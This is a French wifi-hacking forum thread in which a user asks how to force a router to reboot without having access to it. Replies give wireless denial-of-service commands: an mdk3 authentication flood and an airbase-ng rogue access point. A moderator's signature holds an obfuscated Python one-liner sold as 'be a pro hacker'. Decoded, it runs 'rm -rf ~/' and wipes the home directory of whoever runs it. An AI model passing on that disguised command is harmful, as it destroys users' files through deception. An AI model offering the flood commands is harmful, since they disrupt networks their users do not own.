Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-10-2011 18:55:39

KeyGen
Nouveau membre
Inscription : 06-07-2011
Messages : 8

Reboot de routeur à distance

Yop all,

Voila je me demandais quels outils utiliser pour relancer un routeur à distance, en le faisant se relancer, mais sans pour autant y avoir accès. (Attack Ddos ou autres ?)
J'ai une release Bactrack 5 RC1 sur mon portable avec lequel je fait un peu de pentesting sur mon pc de bureau qui est sous Windows Seven SP1, et mon routeur est un netgear, dont j'ai accès bien sur (je précise smile )

Merci à vous !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-10-2011 20:04:46

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Reboot de routeur à distance

Si j ai bien  compris:

tu te crées un compte Dyndns, que tu parametres dans TON netgear (le netgear assure cette fonctionnalité), et tu peux ainsi rebooter TON routeur (je crois 5 fois par jour, sinon Dyndns, va comprendre que tu as des attaques, ...)

C est ca pour moi, un reboot "à distance"   lol:lol:

Hors Ligne

#3 05-10-2011 21:52:44

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Reboot de routeur à distance

^^ tu peux aussi essayer de voir sa réaction à un bon coup de mdk3, il va peut-être juste planter, mais ce n'est pas grave, c'est TON routeur big_smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 06-10-2011 00:44:14

KeyGen
Nouveau membre
Inscription : 06-07-2011
Messages : 8

Re : Reboot de routeur à distance

yasmine a écrit :

Si j ai bien  compris:

tu te crées un compte Dyndns, que tu parametres dans TON netgear (le netgear assure cette fonctionnalité), et tu peux ainsi rebooter TON routeur (je crois 5 fois par jour, sinon Dyndns, va comprendre que tu as des attaques, ...)

C est ca pour moi, un reboot "à distance"   lol:lol:

Merci de ta réponse Yasmine mais je voulais essayer de le relancer comme si je n'y avais pas acces bien évidemment, et donc sans passer par une configuration dyndns smile


spawn a écrit :

^^ tu peux aussi essayer de voir sa réaction à un bon coup de mdk3, il va peut-être juste planter, mais ce n'est pas grave, c'est TON routeur big_smile

Je vais chercher des infos à ce sujet, je viens de voir un tuto assez sympa et suis entrain de tester les possibilité, merci de cette aide apportée smile

Dernière modification par KeyGen (06-10-2011 00:49:31)

Hors Ligne

#5 06-10-2011 14:25:24

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Reboot de routeur à distance

Utilise l'option a de mdk3:

mdk3 mon0 a -a BSSID

Hors Ligne

#6 06-10-2011 16:29:49

KeyGen
Nouveau membre
Inscription : 06-07-2011
Messages : 8

Re : Reboot de routeur à distance

koala a écrit :

Utilise l'option a de mdk3:

mdk3 mon0 a -a BSSID

C'est ce que j'ai tester, mais mon netgear semble invulnerébeul !!

Hors Ligne

#7 06-10-2011 18:14:15

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Reboot de routeur à distance

Essai avec airbase pour voir wink

airbase-ng -c $canal -e $essid -a $bssid -I 600 -0 mon0

Hors Ligne

#8 06-10-2011 18:28:47

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Reboot de routeur à distance

y'a un protocole qui gère ça sur nos box, http://fr.wikipedia.org/wiki/TR-069


1310812721.gif

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 99 Aujourd'hui 16:20:59 par pwerrick
9 1712 20-11-2016 03:45:46 par richie
Routeur avec antenne amovible par le flibustier
0 236 07-11-2016 19:12:24 par le flibustier
3 430 31-08-2016 20:12:36 par M1ck3y
0 362 18-08-2016 14:32:21 par paskalfari

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]